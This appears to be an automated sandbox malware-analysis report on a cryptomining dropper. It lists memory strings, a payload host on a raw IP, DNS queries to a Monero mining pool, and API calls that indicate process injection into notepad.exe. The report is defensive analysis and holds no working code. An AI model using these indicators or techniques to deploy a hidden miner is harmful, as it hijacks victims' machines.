                        Source: svchost.exe, 00000019.00000002.348092248.0000024726949000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","U
Z","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-07-12T08:53:15.0765583Z||.||fe7f9289-8a69-4e31-ba45-f01eb7d6620b||1152921505693653746||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                        Source: svchost.exe, 00000019.00000003.325656679.00000247269AC000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
                        Source: unknown | DNS traffic detected: queries for: xmr-us-east1.nanopool.org
                        Source: P7Oa6i5muL.exe, jwMZjhPggeDR.exe | String found in binary or memory: http://45.144.225.135/config.txt
                        Source: P7Oa6i5muL.exe, 00000005.00000002.465658299.00000000010BA000.00000004.00000020.sdmp | String found in binary or memory: http://45.144.225.135/config.txtL
                        Source: P7Oa6i5muL.exe, 00000005.00000002.465658299.00000000010BA000.00000004.00000020.sdmp | String found in binary or memory: http://45.144.225.135/config.txte=C:
                        Source: P7Oa6i5muL.exe, 00000005.00000002.465658299.00000000010BA000.00000004.00000020.sdmp | String found in binary or memory: http://45.144.225.135/config.txtll
                        Source: P7Oa6i5muL.exe, 00000005.00000002.465658299.00000000010BA000.00000004.00000020.sdmp | String found in binary or memory: http://45.144.225.135/config.txtx
                        Source: P7Oa6i5muL.exe | String found in binary or memory: http://45.144.225.135/notepad.exe
                        Source: svchost.exe, 00000019.00000002.348034206.0000024726900000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                        Source: svchost.exe, 00000019.00000002.348075440.0000024726937000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRoo
                        Source: svchost.exe, 00000019.00000002.348034206.0000024726900000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                        Source: svchost.exe, 0000000B.00000002.468151864.0000023808615000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                        Source: svchost.exe, 00000019.00000002.348034206.0000024726900000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
                        Source: svchost.exe, 00000019.00000002.348034206.0000024726900000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0
                        Source: svchost.exe, 0000000B.00000002.468151864.0000023808615000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
                        Source: svchost.exe, 0000000B.00000002.468151864.0000023808615000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
                        Source: svchost.exe, 0000000B.00000002.469172157.00000238089C0000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                        Source: svchost.exe, 0000000B.00000002.462497537.00000238030B1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumeration
                        Source: svchost.exe, 00000019.00000003.332934004.0000024726986000.00000004.00000001.sdmp | String found in binary or memory: http://universalstore.streaming.mediaservices.windows.net/411ee20d-d1b8-4d57-ae3f-af22235d79d9/1f8e1
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: svchost.exe, 00000014.00000002.309753491.0000019DF3E13000.00000004.00000001.sdmp | String found in binary or memory: http://www.bingmapsportal.com
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
                        Source: svchost.exe, 00000019.00000003.325656679.00000247269AC000.00000004.00000001.sdmp | String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
                        Source: svchost.exe, 00000019.00000003.325656679.00000247269AC000.00000004.00000001.sdmp | String found in binary or memory: http://www.g5e.com/termsofservice
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
                        Source: P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
                        Source: svchost.exe, 00000010.00000002.461853027.0000017D01A3E000.00000004.00000001.sdmp | String found in binary or memory: https://%s.dnet.xboxlive.com
                        Source: svchost.exe, 00000010.00000002.461853027.0000017D01A3E000.00000004.00000001.sdmp | String found in binary or memory: https://%s.xboxlive.com
                        Source: P7Oa6i5muL.exe, 00000000.00000002.219038679.0000000002FEF000.00000004.00000001.sdmp | String found in binary or memory: https://RtlGetVersionntdll.dll
                        Source: svchost.exe, 00000010.00000002.461853027.0000017D01A3E000.00000004.00000001.sdmp | String found in binary or memory: https://activity.windows.com
                        Source: svchost.exe, 00000010.00000002.461853027.0000017D01A3E000.00000004.00000001.sdmp | String found in binary or memory: https://activity.windows.comt
                        Source: svchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmp | String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                        Source: svchost.exe, 00000010.00000002.461853027.0000017D01A3E000.00000004.00000001.sdmp | String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                        Source: svchost.exe, 00000010.00000002.461853027.0000017D01A3E000.00000004.00000001.sdmp | String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                        Source: svchost.exe, 00000019.00000003.332897282.0000024726963000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.332747633.000002472698E000.00000004.00000001.sdmp | String found in binary or memory: https://corp.roblox.com/contact/
                        Source: svchost.exe, 00000019.00000003.332897282.0000024726963000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.332747633.000002472698E000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.332934004.0000024726986000.00000004.00000001.sdmp | String found in binary or memory: https://corp.roblox.com/parents/
                        Source: svchost.exe, 00000014.00000003.309307335.0000019DF3E5A000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                        Source: svchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                        Source: svchost.exe, 00000014.00000002.309808721.0000019DF3E3D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                        Source: svchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                        Source: svchost.exe, 00000014.00000003.309363427.0000019DF3E47000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                        Source: svchost.exe, 00000014.00000003.287575013.0000019DF3E31000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                        Source: svchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                        Source: svchost.exe, 00000014.00000002.309808721.0000019DF3E3D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                        Source: svchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                        Source: svchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                        Source: svchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                        Source: svchost.exe, 00000014.00000003.287575013.0000019DF3E31000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                        Source: svchost.exe, 00000014.00000003.309391302.0000019DF3E40000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                        Source: svchost.exe, 00000014.00000003.309391302.0000019DF3E40000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                        Source: svchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                        Source: svchost.exe, 00000014.00000003.309391302.0000019DF3E40000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                        Source: svchost.exe, 00000014.00000003.309307335.0000019DF3E5A000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                        Source: svchost.exe, 00000014.00000002.309851133.0000019DF3E5C000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                        Source: svchost.exe, 00000014.00000002.309851133.0000019DF3E5C000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                        Source: svchost.exe, 00000014.00000003.309363427.0000019DF3E47000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.309381018.0000019DF3E45000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.309307335.0000019DF3E5A000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.t
                        Source: svchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                        Source: svchost.exe, 00000014.00000002.309808721.0000019DF3E3D000.00000004.00000001.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                        Source: svchost.exe, 00000014.00000003.287575013.0000019DF3E31000.00000004.00000001.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                        Source: svchost.exe, 00000019.00000003.332897282.0000024726963000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.332747633.000002472698E000.00000004.00000001.sdmp | String found in binary or memory: https://en.help.roblox.com/hc/en-us
                        Source: svchost.exe, 00000019.00000003.325656679.00000247269AC000.00000004.00000001.sdmp | String found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
                        Source: svchost.exe, 00000014.00000002.309808721.0000019DF3E3D000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                        Source: svchost.exe, 00000014.00000002.309808721.0000019DF3E3D000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.309753491.0000019DF3E13000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                        Source: svchost.exe, 00000014.00000003.287575013.0000019DF3E31000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                        Source: svchost.exe, 00000014.00000003.309381018.0000019DF3E45000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                        Source: svchost.exe, 00000014.00000003.287575013.0000019DF3E31000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                        Source: svchost.exe, 00000014.00000003.287575013.0000019DF3E31000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                        Source: svchost.exe, 00000014.00000002.309753491.0000019DF3E13000.00000004.00000001.sdmp | String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen19
                        Source: svchost.exe, 00000019.00000003.332897282.0000024726963000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.332747633.000002472698E000.00000004.00000001.sdmp | String found in binary or memory: https://www.roblox.com/develop
                        Source: svchost.exe, 00000019.00000003.332897282.0000024726963000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.332747633.000002472698E000.00000004.00000001.sdmp | String found in binary or memory: https://www.roblox.com/info/privacy
                        Source: svchost.exe, 00000019.00000003.326466123.000002472699D000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.326515844.000002472694D000.00000004.00000001.sdmp | String found in binary or memory: https://www.tiktok.com/legal/report/feedback
                        Source: P7Oa6i5muL.exe, 00000005.00000002.465658299.00000000010BA000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                        System Summary:

                        Source: C:\Windows\notepad.exe | Process Stats: CPU usage > 98%
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Code function: 5_2_00402E40 GetLastError,NtOpenSection,NtMapViewOfSection,NtClose, | 5_2_00402E40
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Code function: 5_2_00408A50 NtOpenProcess,GetExitCodeProcess,NtClose,NtClose, | 5_2_00408A50
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Code function: 5_2_004068E0 RtlDosPathNameToNtPathName_U,NtCreateFile, | 5_2_004068E0
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Code function: 5_2_00407AF0 GetFileAttributesW,RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,NtClose, | 5_2_00407AF0
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Code function: 5_2_00403680 NtCreateFile, | 5_2_00403680
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Code function: 5_2_00403CA0 NtClose,GetSystemInfo,RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,NtClose, | 5_2_00403CA0
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Code function: 5_2_00406340 GetModuleFileNameW,RtlDosPathNameToNtPathName_U,NtCreateFile,GetFileSizeEx,NtClose,VirtualAlloc,NtClose,NtReadFile,NtClose,VirtualFree,NtClose,RtlDosPathNameToNtPathName_U,VirtualFree,NtCreateFile,NtWriteFile,NtClose,VirtualFree,NtClose,VirtualFree, | 5_2_00406340
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Code function: 5_2_00403B50 NtClose, | 5_2_00403B50
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Code function: 5_2_00403720 NtCreateFile,NtCreateFile, | 5_2_00403720
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Code function: 5_2_00403BC0 NtCreateFile,NtWriteFile,NtClose,NtClose, | 5_2_00403BC0
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Code function: 5_2_004037E0 RtlDosPathNameToNtPathName_U,NtCreateFile,GetFileSizeEx,VirtualAlloc,NtReadFile,NtClose,VirtualFree,NtClose,VirtualFree,NtClose, | 5_2_004037E0
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Code function: 5_2_004029E0 DeleteFileW,RtlImageNtHeader,NtOpenProcess,NtClose,NtAllocateVirtualMemory,VirtualAlloc,GetProcAddress,NtWriteVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,RtlCreateUserThread,NtWaitForSingleObject,Sleep,Sleep,NtWaitForSingleObject,TerminateThread,GetExitCodeThread,NtClose,NtFreeVirtualMemory,NtClose,VirtualFree,NtFreeVirtualMemory,NtFreeVirtualMemory,NtClose,VirtualFree,NtFreeVirtualMemory,NtClose, | 5_2_004029E0
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Code function: 5_2_00406990 RtlDosPathNameToNtPathName_U,NtCreateFile, | 5_2_00406990
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Code function: 5_2_004085B0 RtlInitUnicodeString,NtOpenKey,GetLastError,RtlInitUnicodeString,GetLastError,NtQueryValueKey,NtClose,NtClose, | 5_2_004085B0
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Code function: 5_2_00405420 CreateProcessW,NtQueryInformationProcess,GetCurrentProcess,GetThreadContext,ReadProcessMemory,ReadProcessMemory,GetCurrentProcess,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,NtClose,NtClose,GetCurrentProcess,GetCurrentProcess,ReadProcessMemory,ReadProcessMemory,GetCurrentProcess,GetCurrentProcess,VirtualAlloc,ReadProcessMemory,VirtualFree,VirtualFree,GetProcAddress,Sleep,VirtualAlloc,VirtualFree,CloseHandle,CloseHandle,CloseHandle,NtClose,NtClose,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess, | 5_2_00405420
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Code function: 5_2_00406D50 NtClose, | 5_2_00406D50
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Code function: 5_2_00406D70 NtClose, | 5_2_00406D70
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Code function: 5_2_00408730 NtOpenProcess,NtTerminateProcess,NtClose, | 5_2_00408730
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Code function: 5_2_004087C0 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,NtClose, | 5_2_004087C0
                        Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Code function: 0_2_014DC0F4 | 0_2_014DC0F4
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Code function: 0_2_014DE528 | 0_2_014DE528
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Code function: 0_2_014DE538 | 0_2_014DE538
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Code function: 0_2_07296F02 | 0_2_07296F02
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Code function: 0_2_0729DF10 | 0_2_0729DF10
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Code function: 0_2_0729B7B8 | 0_2_0729B7B8
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Code function: 0_2_0729E680 | 0_2_0729E680
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Code function: 0_2_0729D270 | 0_2_0729D270
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Code function: 0_2_07299070 | 0_2_07299070
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Code function: 0_2_0729274A | 0_2_0729274A
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Code function: 0_2_07298539 | 0_2_07298539
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Code function: 0_2_0729F381 | 0_2_0729F381
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Code function: 0_2_07296060 | 0_2_07296060
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Code function: 0_2_073BBE93 | 0_2_073BBE93
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Code function: 0_2_073BBEC5 | 0_2_073BBEC5
                        Source: C:\Program Files (x86)\oEKXHcMAcoyGDsAvZbduvWYmkwuLXdlUfatRVrQXAjmYBvhKscWCgRJhDvhPpZlMOnCZwSiBBxVnVLWt\jwMZjhPggeDR.exe | Code function: String function: 035D2F80 appears 35 times
